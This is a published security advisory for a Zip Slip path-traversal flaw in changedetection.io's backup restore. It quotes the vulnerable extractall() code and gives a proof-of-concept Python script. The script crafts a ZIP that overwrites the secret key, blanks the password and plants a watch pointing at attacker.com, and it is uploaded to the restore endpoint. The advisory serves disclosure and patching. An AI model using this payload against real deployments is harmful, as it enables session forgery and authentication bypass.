changedetection.io has Zip Slip vulnerability in the backup restore functionality
GHSA-25g8-2mcf-fcx9 · CVE-2026-29065
Published · Modified
Description
Summary
A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives.
Details
A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. The application uses zipfile.extractall() without validating entry paths, allowing ../ sequences to escape the extraction directory.
Vulnerable Code (lines 50-53):
def restore_backup(self, filename):
with zipfile.ZipFile(filename, 'r') as zip_ref:
# VULNERABLE: No path validation before extraction
zip_ref.extractall(self.datastore_path)
The extractall() function preserves the relative paths stored within the ZIP archive. When a malicious ZIP contains entries with ../ path traversal sequences, these files are extracted outside the intended directory.
| Path in ZIP | Target File | Impact |
|---|---|---|
| ../secret.txt | Flask secret key | Session forgery, auth bypass |
| ../changedetection.json | App settings | Disable password, inject backdoor |
| ../url-watches.json | Watch index | Inject malicious watches |
| ../{uuid}/watch.json | Watch config | Modify any watch |
Attacker uploads ZIP via the backup restore functionality at /backups/restore
Application extracts files without validation, writing attacker content to sensitive locations
PoC
Step 1: Create Malicious ZIP
import zipfile
import json
with zipfile.ZipFile("zipslip.zip", "w") as zf:
# Escape extraction directory with ../
zf.writestr("../secret.txt", "ATTACKER-CONTROLLED-SECRET")
zf.writestr("../changedetection.json", json.dumps({
"settings": {"application": {"password": ""}}
}))
zf.writestr("../pwned-uuid-1234/watch.json", json.dumps({
"url": "https://attacker.com/zipslip-pwned",
"title": "🔴 ZIPSLIP-PROOF"
}))
Step 2: Upload via Restore Endpoint
-F "zip_file=@zipslip.zip" \
-F "include_watches=y" \
-F "include_settings=y"
###Step 3: Verify Path Traversal
Check if watch escaped to /datastore/
###ls -la /datastore/
Look for: pwned-uuid-1234/
Verify in UI
curl "http://target:5000/" | grep "ZIPSLIP"
References
- WEB https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-25g8-2mcf-fcx9
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-29065
- WEB https://github.com/dgtlmoon/changedetection.io/commit/1d7d812eb0faab37042246e2fbce04f29bb1b3aa
- PACKAGE https://github.com/dgtlmoon/changedetection.io
- WEB https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.4
Ready to move
Start Securing
Free, no credit card | First findings in minutes